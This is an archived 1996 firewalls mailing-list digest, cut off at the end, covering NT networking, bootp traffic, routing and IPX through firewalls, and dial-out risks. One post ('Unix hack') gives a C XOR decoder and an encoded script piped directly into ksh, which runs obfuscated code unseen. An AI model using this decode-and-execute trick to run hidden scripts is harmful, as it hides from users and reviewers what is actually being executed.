(majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA28015 for firewalls-outgoing; Thu, 8 Feb 1996 07:10:53 -0800 (PST) Received: from bbnplanet.com (poblano.near.net [198.114.157.116]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA28010 for ; Thu, 8 Feb 1996 07:10:49 -0800 (PST) Received: from osborn.bbnplanet.com by poblano.bbnplanet.com id aa19531; 8 Feb 96 10:10 EST Message-ID: <311A11E9.193A399E@bbnplanet.com> Date: Thu, 08 Feb 1996 10:08:25 -0500 From: Chris Osborn X-Mailer: Mozilla 2.0 (X11; I; Linux 1.2.13 i586) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: Re: I want details!!! Re: NT's TCP/IP stack Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chris Osborn wrote: > > Robert Dana wrote: > > > > OK, I'm getting really frustrated about the lack of details about NT's > > deficiencies. I couldn't care less about OS bigotry- I'll use whatever systems > > > [text deleted] > > > > Scott Barman writes: > > > Hopefully, when folks put NT on the internet, they will find the same > > > thing I found through experimentation: it has multitasking that can't > > > get out of its own way, it can't handle the load of a medium-low > > > environment, and if something goes wrong, there isn't a quick interface > > > to fix things (by passing that maze of twisty little menus all > > > different!). > This is a valid argument against using NT. Many operations in NT do require many levels of menus to finally find the correct option. It is often easier to give technical support to the poor user by telling them "type kill -HUP blah" instead of "click on this, click on that", etc etc. This is especially true when troubleshooting and many modifications must be made in rapid sucession until the "right one" is found. Much troubleshooting time on NT is waiting for the GUI(or rebooting the server) The command line can be the difference between 5 minutes of downtime or 1/2 hour of downtime(expand that forward as appropriate). > Of course NT applications could be written with the command line options available. > The NT command line isn't that shabby but the application builders are not allowing use of it. > > > > > [...] > > > > > Yea, it's called living the hype and beliving the b.s. from marketing > > > machines. No controversy here--especially when I don't believe what I > > > read or hear from know M.$.... err... b.s. artists. > > > > I don't mean to single Scott out- his is just the most recent example. We can > > bitch about MS's unsubstantiated marketing claims all we want, but making > > similarly unsubstantiated claims opposing them doesn't help at all. Exactly > > what are the deficiencies of the IP or TCP implementations of NT for the > > environment most of us care about (IP over ethernet)? Why won't a firewall on > > NT be capable of handling a connection faster than 64k? > Unfortunatly we can't be sure(if it is indeed the case). One can fire packets at the machine and say X packets were dropped and be sure about that. BUT.. As to why they are dropped, there are a limited number of ways to find out: 1) Look at the source and find the ineffecient code:-). 2) try changing the registry until performance improves although I have found that more cryptic than a lot of source code a) the gui makes this take a LONG time as you wait for it to load > As with others, I would feel more comforatable hearing NUMBERS to back up some of these claims about firewall XXX on OS YYY being slow/fast. Inclusion of any relevent data would be nice. This does not only apply to NT based firewalls. > [text deleted] > > > ep your OS religion to yourself. Sure, UNIX is what I'm most > > comfortable with for now, but that doesn't change the fact that I have to deal > > with NT whether I want to or not. GIVE US FACTS. > NT is coming along fast. I think microsoft has pumped a lot of money into it and many corporation are going to NT based solutions. Why? One because they are at the same stage that IBM was a few years ago ... remember "Can't go wrong with buying IBM". > Two, it is easy to use. Unix had a shot but lost out. Nobody wanted to make unix BOTH easy to use and powerful. There are finally (within the last couple years) firewalls and other apps under UNIX that use a decent GUI. I could rant on how there are 15 diferent guis for unix etc etc. > Is NT ready for prime time corporate networking including use in the firewall arena? Not really, for example rebooting is far to common a procedure when doing anything on NT. Don't want to be rebooting my mission critical server every time I change a network configuration. > NT is getting better with each revision and will be a force to be reconed with as the processors and memory get cheaper. > All these comments are made by UNIX weinee. > > > > > -Robert > > > > -- > > Robert Dana (713) 650-6522 x240 > > Director of Network Services > > WorldCom, the International Network for Lotus Notes > +-------------------------------------------------------------------+ Chris Osborn BBN Planet cosborn@bbnplanet.com Software Engineer From firewalls-owner Thu Feb 8 08:29:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA00117 for firewalls-outgoing; Thu, 8 Feb 1996 08:01:00 -0800 (PST) Received: from netsurfer.pixi.com (netsurfer.pixi.com [140.174.243.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA29994 for ; Thu, 8 Feb 1996 08:00:53 -0800 (PST) Received: from netsurfer by netsurfer.pixi.com ; 8 FEB 96 05:57:43 Date: Thu, 8 Feb 1996 05:57:42 -1000 (HST) From: NetSurfer X-Sender: netsurf@netsurfer To: firewalls@greatcircle.com Subject: Re: NT's TCP/IP stack + NetManage NEWT conflict. -Reply In-Reply-To: Message-ID: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 7 Feb 1996, Chris Jenkins wrote: > Since MS gives you TCP/IP and WINSOCK, most third party applications > should be able to run. If I recall correctly, I think that some of Chameleons > applications will run on MS tcp/ip stack. Not on NT AFAIK unless you have the NT version of Chamelion. #include _ __ __ _____ ____ / | / /__ / /_/ ___/__ _______/ __/__ _____ / |/ / _ \/ __/\__ \/ / / / ___/ /_/ _ \/ ___/ / /| / __/ /_ ___/ / /_/ / / / __/ __/ / ================/_/=|_/\___/\__//____/\__,_/_/==/_/==\___/_/=============== From firewalls-owner Thu Feb 8 08:33:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA00263 for firewalls-outgoing; Thu, 8 Feb 1996 08:05:53 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA00258 for ; Thu, 8 Feb 1996 08:05:49 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-960123) id IAA24760; Thu, 8 Feb 1996 08:02:15 -0800 Received: from relay6.uu.net(192.48.96.16) by mycroft via smap (V1.3mjr) id sma024758; Thu Feb 8 08:01:41 1996 Received: from maestro.Maestro.COM by relay6.UU.NET with SMTP id QQacay12345; Thu, 8 Feb 1996 11:03:13 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA28068; Thu, 8 Feb 96 10:52:37 EST Date: Thu, 8 Feb 1996 10:52:36 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: Unix hack Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hukd on Fonix asked: what I am looking to do is execute code from from a pipe in the csh. I want to be able to take an encrypted script, decrypt it to a pipe and have the csh interpret that stream without creating an intermediate file. I think that unix will create /tmp files for buffering the stream, but I don't care about that. Well, SP passed it on to Garabisje Dawg, and HE sez: // Begin x.c #include main() { char ch; while( (ch=getc(stdin) ) != EOF ) putc( ch ^ 11, stdout ); } // End x.c file called: y.enc ----------- cut here ------ B6)jf)J6)Ebhn)+nhcd+)B+/B+j+/J+L~rWeNb}beoWe) ----------- end y.enc ----- N.B. There is no EOF in y.enc How to do it on a UNIX box: make x cat y.enc | x | ksh - Garabisje Dawg --------------------------------------------------------------- When you run it, you will get the name of the mask behind the mask. Regret no further requests for hacks can be honored as staff and financial resources have not been not been bugeted by the Church for this purpose and I don't want to get kicked of this list like I got kicked off the others. Sick Puppy, the Cat_Eating_Dawg the Church of the Dead Meow From firewalls-owner Thu Feb 8 09:01:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA01378 for firewalls-outgoing; Thu, 8 Feb 1996 08:48:54 -0800 (PST) Received: from mickey.ovid.com (mickey.ovid.com [198.242.51.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA01371 for ; Thu, 8 Feb 1996 08:48:49 -0800 (PST) Received: by mickey.ovid.com (AIX 3.2/UCB 5.64/4.03) id AA18651; Thu, 8 Feb 1996 09:47:12 -0700 Date: Thu, 8 Feb 1996 09:47:11 -0700 (MST) From: Adam Prato To: Damir Rajnovic Cc: firewalls@GreatCircle.COM Subject: Re: 0.0.0.0 address on LAN In-Reply-To: <199602080918.KAA17830@hvar.mzt.hr> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 8 Feb 1996, Damir Rajnovic wrote: > Date: Thu, 8 Feb 1996 10:18:27 +0100 (MET) > From: Damir Rajnovic > To: firewalls@GreatCircle.COM > Subject: 0.0.0.0 address on LAN > > Hello, > > Someone ask who produce 0.0.0.0 ip address, answer is Win95 (and NT > maybe - don't have it around so can't be shure). Here is excerpt: > > Client: 0.0.0.0 (null) Server 255.255.255.255 (broadcast) > OpCode 0x01: BOOTREQUEST , MAC Address Type: 1, MAC Address Length: 6 > Hops: 0, XID: 0000AF37, trying since 1024 second(s) > > and that guy have Win95 on his machine. this looks like a 'bootp' request. Many printers, X terminals, and other standalone remote devices use it. Adam From firewalls-owner Thu Feb 8 09:23:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA02416 for firewalls-outgoing; Thu, 8 Feb 1996 09:11:49 -0800 (PST) Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA02394 for ; Thu, 8 Feb 1996 09:11:43 -0800 (PST) Received: from uucp4.UU.NET by relay5.UU.NET with SMTP id QQacbc21742; Thu, 8 Feb 1996 12:10:54 -0500 (EST) Received: from vanguard.UUCP by uucp4.UU.NET with UUCP/RMAIL ; Thu, 8 Feb 1996 12:10:56 -0500 Received: by vanguard.hmp.com (UUPC/extended 1.12b); Thu, 08 Feb 1996 09:12:27 MST Date: Thu, 08 Feb 1996 09:12:23 MST From: "Scott Deshaies" Message-ID: <311a20eb.vanguard@vanguard.hmp.com> Organization: High Mountain Press, Inc. Reply-To: "Scott Deshaies" To: doug@fc.com Cc: "Firewalls Mailing List" Subject: Re: NT Firewalls/Web Servers Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 7 Feb 1996 15:48:11 -0500 (EST), long-morrow@CS.YALE.EDU wrote: > Doug@fc.com wrote: > >Does anyone know of any good NT Firewalls and Web Servers? > There are a number of different good Web Servers for NT (Netscape's, > Microsoft's, O'Reilly & Assoc. WebSite, etc.): Process Software (http://www.process.com/) has Purveyor 1.2 for NT which is a nice package. It's greatly improved from the EMWAC https server that it has it's roots from, and also supports http/ftp proxies. It even supports proxy-to-proxy connections, so your intranet server can tunnel across your firewall to your external server. You can then limit the size of the hole in your firewall. -- >> Scott R. Deshaies <> High Mountain Press, Inc. << >> MIS Manager <> 2530 Camino Entrada * Santa Fe, NM 87505 << >> sdeshaies@hmp.com <> Direct:505/474-5103 http://www.hmp.com << From firewalls-owner Thu Feb 8 09:38:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA02998 for firewalls-outgoing; Thu, 8 Feb 1996 09:29:07 -0800 (PST) Received: from gxl.woodtech.com (gxl.woodtech.com [204.248.87.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA02990 for ; Thu, 8 Feb 1996 09:28:59 -0800 (PST) Received: (from joey@localhost) by gxl.woodtech.com (8.6.12/8.6.12) id LAA26030; Thu, 8 Feb 1996 11:32:52 -0600 Date: Thu, 8 Feb 1996 11:32:50 -0600 (CST) From: "Joe Smith (Really!)" To: Adam Prato cc: Damir Rajnovic , firewalls@GreatCircle.COM Subject: Re: 0.0.0.0 address on LAN In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Except Win95 only supports DHCP. On Thu, 8 Feb 1996, Adam Prato wrote: > > > On Thu, 8 Feb 1996, Damir Rajnovic wrote: > > > Date: Thu, 8 Feb 1996 10:18:27 +0100 (MET) > > From: Damir Rajnovic > > To: firewalls@GreatCircle.COM > > Subject: 0.0.0.0 address on LAN > > > > Hello, > > > > Someone ask who produce 0.0.0.0 ip address, answer is Win95 (and NT > > maybe - don't have it around so can't be shure). Here is excerpt: > > > > Client: 0.0.0.0 (null) Server 255.255.255.255 (broadcast) > > OpCode 0x01: BOOTREQUEST , MAC Address Type: 1, MAC Address Length: 6 > > Hops: 0, XID: 0000AF37, trying since 1024 second(s) > > > > and that guy have Win95 on his machine. > > this looks like a 'bootp' request. Many printers, X terminals, and other > standalone remote devices use it. > > Adam > From firewalls-owner Thu Feb 8 09:53:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA02816 for firewalls-outgoing; Thu, 8 Feb 1996 09:25:03 -0800 (PST) Received: from tigger.jvnc.net (tigger.jvnc.net [128.121.50.145]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA02809 for ; Thu, 8 Feb 1996 09:24:56 -0800 (PST) Received: from mikes.barstool.com (mahal.webex.net) by tigger.jvnc.net with SMTP id AA09117 (5.65c/IDA-1.4.4 for firewalls@GreatCircle.com); Thu, 8 Feb 1996 12:24:02 -0500 Message-Id: <199602081724.AA09117@tigger.jvnc.net> Comments: Authenticated sender is From: "Michael Langdon" Organization: RPM Associates, Inc. To: firewalls@GreatCircle.com Date: Thu, 8 Feb 1996 12:23:48 -0500 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Subject: Re: routing table go through firewall ? X-Mailer: Pegasus Mail for Windows (v2.23) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You should be able to pass routing broadcast through the firewall. I will make an assumption that you are using cisco routers, if not, the same method should apply asuming your routers can support similar commands. Set up your firewall to pass protocol 9, which is the protocol number for IGP (any internal gateway protocol). Don't worry about port numbers since it isn't applicable. Make your source and destination addresses appropriate, either peer-to-peer or any-to-any. Set cace timeouts for this rule to be low (10 seconds should be good) if you want routing transactions logged, otherwise, routing updates will be often enough not to time out the session cache on the firewall. On the routers you can set up peering relationships that avoid the normal routing broadcast to 255.255.255.255 which firewalls usually don't like to deal with. Also if you run different subnets on either side of your firewall you need to add secondary addresses to your routers of the subnets opposite them on the firewall. You need this otherwise the router may get an update but toss it as an invalid source. Add static arp entries into your routers pointing the address of the router interface (your peer) on the other side of the firewall at the interface of the firewalls closest interface. This allows each router to forward routing updates to the firewall for forwarding. ...and behold...it works like a charm....you mileage may vary. Mike On 8 Feb 96 at 12:21, F.Wetzels@amc.uva.nl wrote: > fpmw> I am testing our fw-1 and have got a question before > fpmw> implementing our secuity. > fpmw> I will use dual homed g/w with fw-1 and connect each ends to the internet > fpmw> and our internal network. > fpmw> > fpmw> Our net -- Router ----- F/W ---- Router -- Internet > fpmw> | > fpmw> BBS Server ... > fpmw> The question is that each router can exchange each routing table or not ? > fpmw> If can , How it's possible. ? > From firewalls-owner Thu Feb 8 10:08:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA03976 for firewalls-outgoing; Thu, 8 Feb 1996 09:52:36 -0800 (PST) Received: from laptev.imonics.com (laptev.imonics.com [205.139.208.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA03971 for ; Thu, 8 Feb 1996 09:52:31 -0800 (PST) Received: from thyrsus.imonics.com (thyrsus [205.139.209.197]) by laptev.imonics.com (8.7.3/8.7.3) with SMTP id MAA15761; Thu, 8 Feb 1996 12:51:32 -0500 (EST) From: Stephen Schaefer - Network Computing Solutions Received: by thyrsus.imonics.com (5.x/SMI-SVR4) id AA01106; Thu, 8 Feb 1996 12:51:27 -0500 Date: Thu, 8 Feb 1996 12:51:27 -0500 Message-Id: <9602081751.AA01106@thyrsus.imonics.com> To: firewalls@GreatCircle.COM In-Reply-To: <9602081105.AA12965@spibm02> (message from Rolf Weber on Thu, 8 Feb 1996 12:05:46 +0100 (MEZ)) Subject: Re: Most Secure Unix? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>[Jon Spencer] >> I think perhaps my point wasn't made clearly. The firewall can only be as >> good as the OS on which it exists. If your firewall is an application >> on top of an OS, I can break the firewall by breaking the OS. >> >[Rolf Weber] >i never heard of any breakin possible because of a kernel bug. >may be i'm wrong, may be it's possible, but i cannot imagine. The context here seems to be ``break in using only the net'', and thus the following example may be deemed disallowable, but the last statement immediately brings to my mind the symbolic-link-to-suid-shell-script bug. - Stephen From firewalls-owner Thu Feb 8 10:20:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA02221 for firewalls-outgoing; Thu, 8 Feb 1996 09:06:57 -0800 (PST) Received: from pfg-bh.principal.com (pfg-bh.principal.com [204.167.169.66]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA02216 for ; Thu, 8 Feb 1996 09:06:50 -0800 (PST) Received: (from uucp@localhost) by pfg-bh.principal.com (8.6.12/8.6.11) id LAA01372 for ; Thu, 8 Feb 1996 11:08:13 -0600 Received: from mailhub1.principal.com(162.131.2.16) by pfg-bh.principal.com via smap (V1.3) id sma001370; Thu Feb 8 11:08:02 1996 Received: from pfgmvs1.principal.com by mailhub1.principal.com; Thu, 8 Feb 96 11:02:52 -0600 Received: from PFGMVS1 by PFGMVS1 (IBM MVS SMTP V3R1) with BSMTP id 0488; Thu, 08 Feb 96 11:05:00 CST Date: Thu, 8 Beb 96 10:56:27 CST To: Cc: "*internet " <*INTERNE%EMC2TNN@PFGMVS1.principal.com> From: "HEROLD.BECKY" Subject: RE: Dial-out risks Message-Id: <311a2cca5de3004@mailhub1.principal.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk OUCH! Judging by a couple of responses I received to the message I posted yesterday, and rereading my post, I obviously did NOT make the point of my message clear! The point I was trying to make was that people need to be made aware of why they SHOULD use the firewall to access the Internet, and not just slap a modem on their networked PCs. Putting a modem on the networked PC is the "bad thing" I was referring to in the following. (I should have written as "...explain to people why putting a modem on a PC is a bad thing...") I've found employees are more willing to follow policies when we can provide an explanation of the risks involved instead of just saying "Don't do that because we said so!" And, reality is, many people will take it upon themselves to reconfigure their PC if they feel they have a business need... unless (perhaps) they understand the risks involved. >An important key to the success of a firewall is ensuring employees use it! >This can require quite the sales job. In order to get buy-in (hopefully >going from top management down through the ranks) it is necessary (in our >organization anyway) to explain to people why what they want to do is a bad >thing for the corporate network. One of the bad things people will want to >do is install modems on PCs that are attached to the WAN and use them for >"dial-out only". It is a challenging task to convince them that doing this >DOES create a risk, even if they are using a non-DID phone line. (Especially >if the WAN has tens of thousands of nodes spread across a geographically huge >area.) Yes, I agree that dialing out is a necessity for most businesses, and that dial-out access needs to occur through a single point on the network, or some other secured system. I'm looking for details that I can share with employees explaining WHY they need to use the corporate solution (eg., firewall) to accomplish their dial-out business needs. Since many of these folks are technical, it would help if I had some technical information to go along with the general reasons. I don't think giving them information on these risks is trying to control them with fear...it's just a way of explaining what can happen. If any of you can provide more details on the risks I listed yesterday (for PCs with modems), or have even more risks to add, I'd appreciate receiving them! Thanks, Becky Herold, Sr. Systems Analyst, Information Protection herold.becky@principal.com =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- The opinions expressed here are strictly my own and do not necessarily represent those of my employer. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From firewalls-owner Thu Feb 8 10:23:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA03450 for firewalls-outgoing; Thu, 8 Feb 1996 09:39:52 -0800 (PST) Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA03445 for ; Thu, 8 Feb 1996 09:39:46 -0800 (PST) Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA03510; Thu, 8 Feb 96 11:41:46 CST Received: by mnbp.network.com with Microsoft Mail id <311A34B1@mnbp.network.com>; Thu, 08 Feb 96 11:36:49 CST From: Craig McLellan To: firewalls Subject: RE: ipx routing Date: Thu, 08 Feb 96 11:36:00 CST Message-Id: <311A34B1@mnbp.network.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You could look at Network Systems Borderguard or Security Router. Both platforms provide multi-protocol firewalling. IPX, IP and all bridged traffic as well. www.network.com RGRDS.....clm ---------- From: firewalls-owner To: firewalls@GreatCircle.COM; 'Lehrer, Neil' Subject: RE: ipx routing Date: February 7, 1996 18:42 ---------- From: Lehrer, Neil[SMTP:nlehrer@usia.gov] Sent: Wednesday, February 07, 1996 8:19 AM To: firewalls@GreatCircle.COM Subject: ipx routing ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: Re IPX routing paul.carrol@medaphis.com offered up: >I am about to setup a firewall for our Internet link. > >I have recently learned that we are bringing in an X.25 line from=20 Compuserve. >The line runs into a Compuserve box that resides here that we do NOT=20 control. > >From the Compuserve box, a line runs into one of our router interfaces. > >Obviously, I want to firewall this link as well... >It passes IPX and TCP/IP, and needs to do both. > >The problem I have is with IPX. We have decided on Raptor Eagle as our=20 firewall. >It will run on a SUN Sparc 20, and it will NOT pass IPX. > >Any suggestions? Well .. not sure whether this works or not, but I'd be interested in=20 comments myself. Is IPX critical for you ? I ask because we're running IP and IPX on our LAN here, and I'm being=20 pushed to allow both across our firewalling mechanism. Our Netware guy = said to me the other day that we needed IPX as some products actually = require IPX in order to work. This sounds like snake oil to me - I'd = have thought that the underlying protocol - whether IP or IPX should = make no difference whatsoever. Any comments on this ? It's also been = suggested to me that Novell/IP works by simply encapsulating IPX within = an IP packet - this doesn't quite sound like full IP to me. Can anyone = comment upon this ? If we can move everything to IP, then our problems = potentially disappear here, and I needn't route IPX at all. Sound easy = to me from there (ish!). I wonder Paul, whether you could do something along these lines ? I=20 wonder everyone whether you all think I'm pouring snake oil around the = place too=20 ? :) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` it is true that some netware products use ipx/spx directly. whether = they=20 would work properly, or at all, with netware/ip is something you would=20 have to test (unfortunately). -------------------------------------------------------------------------= ----------------- Native IP has been available for NetWare servers for sometime; the = problem is that the NetWare Core Protocols have'nt been supported from = IP until recently. Since most user apllications are using workstation or server services = (NCP), installing IP wouldn't help advance these services over non-IPX = links. It simply supplied ftp, lpd and other such unix-like services. = Some IPX to IP encapsulation is available but I have'nt had much = experience with it. NetWare 4.1, however, ships with a module called NetWare/IP. It allows = a 4.1 server to act as an IP to IPX gateway, forward IPX RIP/SAP over IP = and so forth. Additionally, NetWare IP provides IP workstation shells = that use IP for NCP (about time!) . The easiest solution to force the IPX traffic through a firewall would = be to provide an IPX to IP NetWare gateway on the unsecure side of the = firewall. It would be configured to forward RIP/SAP and translated IPX = packets via the firewall to an IP to IPX NetWare gateway on the secure = side of the firewall. Of course, the NetWare server on the unsecure side of the firewall is = attackable. =20 The only other solution is to have the service provider create a gateway = on their secure network and forward IPX packets and RIP/SAP. From firewalls-owner Thu Feb 8 10:42:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA04946 for firewalls-outgoing; Thu, 8 Feb 1996 10:06:09 -0800 (PST) Received: from gatekeeper.hcc.com (GATEKEEPER.HCC.COM [148.163.104.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA04941 for ; Thu, 8 Feb 1996 10:06:03 -0800 (PST) Received: by gatekeeper.hcc.com (5.65/jj-092193); id AA15496; Thu, 8 Feb 1996 13:05:06 -0500 Received: by mailgate.bridgewater.ne.hcc.com (5.65/ejc-092393< Who Loves Class M Planets>); id AA17235; Thu, 8 Feb 1996 13:05:04 -0500 Received: from localhost (localhost [127.0.0.1]) by gumby.bridgewater.ne.hcc.com (8.6.10/8.6.10) with SMTP id JAA03098; Thu, 8 Feb 1996 09:24:57 -0500 From: "Edward J.M. Carley Jr." Message-Id: <199602081424.JAA03098@gumby.bridgewater.ne.hcc.com> X-Authentication-Warning: gumby.bridgewater.ne.hcc.com: Host localhost didn't use HELO protocol To: security@crpht.lu (Bruno MAMER) Cc: firewalls-digest@GreatCircle.COM, ejc@gumby.bridgewater.ne.hcc.com Subject: Re: Firewall, yes, but policy first ! In-Reply-To: Your message of "Wed, 07 Feb 96 18:24:43 +0100." Date: Thu, 08 Feb 96 09:24:51 -0500 X-Mts: smtp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Bruno I think the book you're looking for can be found at BASELINE Software Inc. in Sausalito, Calif. The author is Charles Cresson Wood, they're reachable at 800-829-9955 or http://www.baseline.com/people/infosec or info@baselinesoft.com. Hope this helps! cheers ejc //////////////////////////////////////////////////////////////////////// // Ed Carley // // ejc@hcc.com || ejc@gumby.bridgewater.ne.hcc.com // // Work (908)231-2525 Home (908)969-8688 // //////////////////////////////////////////////////////////////////////// From firewalls-owner Thu Feb 8 10:53:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA07928 for firewalls-outgoing; Thu, 8 Feb 1996 10:47:38 -0800 (PST) Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA07922 for ; Thu, 8 Feb 1996 10:47:27 -0800 (PST) Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id MAA13868 for greatcircle.com!firewalls; Thu, 8 Feb 1996 12:37:59 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA15841; 8 Feb 96 12:05:27 CST (Thu) Received: by sonic.nmti.com; id AA04496; Thu, 8 Feb 1996 11:36:11 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9602081736.AA04496@sonic.nmti.com.nmti.com> Subject: Re: Strange protoc To: auampdrv@ibmmail.com (George Janczuk JZKGEQ - AMPLN1) Date: Thu, 8 Feb 1996 11:36:10 -0600 (CST) Cc: firewalls@greatcircle.com In-Reply-To: <199602080704.XAA04381@miles.greatcircle.com> from "George Janczuk JZKGEQ - AMPLN1" at Feb 8, 96 01:52:38 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > We have some people interested in accessing CITRIX's WinFrame product over > the Internet. Do any people have any knowledge as to how WinFrame uses > TCP/IP? If it's like WinDD (which uses the same protocol) it uses a single TCP port for the whole connection, and doesn't encrypt... it's pretty much like opening general X traffic, with the same hijacking potential, except you get security through obscurity because the protocol is new and not well known. > Have people run it though their firewall? I accessed a remote WinDD box through our firewall when Tektronix was demoing it. From firewalls-owner Thu Feb 8 11:05:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA04490 for firewalls-outgoing; Thu, 8 Feb 1996 09:59:49 -0800 (PST) Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA04477 for ; Thu, 8 Feb 1996 09:59:42 -0800 (PST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id LAA21816 for ; Thu, 8 Feb 1996 11:58:21 -0600 (CST) Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id LAA21812 for ; Thu, 8 Feb 1996 11:58:20 -0600 (CST) Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id LAA08977; Thu, 8 Feb 1996 11:58:47 -0600 (CST) Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id LAA03555; Thu, 8 Feb 1996 11:58:48 -0600 Date: Thu, 8 Feb 1996 11:58:48 -0600 From: Rick Smith Message-Id: <199602081758.LAA03555@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: Mandatory protection (was: product selection) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >In message <9602021404.AA18008@mordred.sware.com> Charles Watt writes: >> Fine. You've got a nice system. Its use of TE-based MAC gives it some >> definite competitive advantages over those systems that do not use MAC, >> if integrated and administered properly. But TE provides no advantage >> over a similar system based on MAC, such as the Harris firewall. There >> you must compete based upon other features, such as better application >> support or ease of administration. And Karen Goertzel writes: >Or portability. Actually, Sidewinder's TE and Unix MLS systems should be fairly similar here, assuming the particular MLS implementation puts reasonable restrictions on root mode software. We drop shrink wrapped BSDI software into a separate domain on Sidewinder. It's immediately isolated from other components but still runs as if it's on a plain Unix system. One thing that was obvious from our LOCK R&D experience was that you had to a strong but controlled notion of suid root if you wanted to be Unix compatible in a useful way. In any case the system must still enforce mandatory protections even if software is running suid root. Otherwise they aren't mandatory. Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Feb 8 11:08:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA08133 for firewalls-outgoing; Thu, 8 Feb 1996 10:51:36 -0800 (PST) Received: from balder.ssds.com (balder.ssds.com [204.131.72.62]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA08128 for ; Thu, 8 Feb 1996 10:51:31 -0800 (PST) Received: (from mail@localhost) by balder.ssds.com (8.6.9/8.6.9.SSDSnet-hub) id LAA21259; Thu, 8 Feb 1996 11:50:29 -0700 Received: from denver(134.127.16.1) by balder via smap (V1.3) id sma021256; Thu Feb 8 11:50:23 1996 Received: from baltimore.ssds.com (baltimore.ssds.com [134.127.34.1]) by 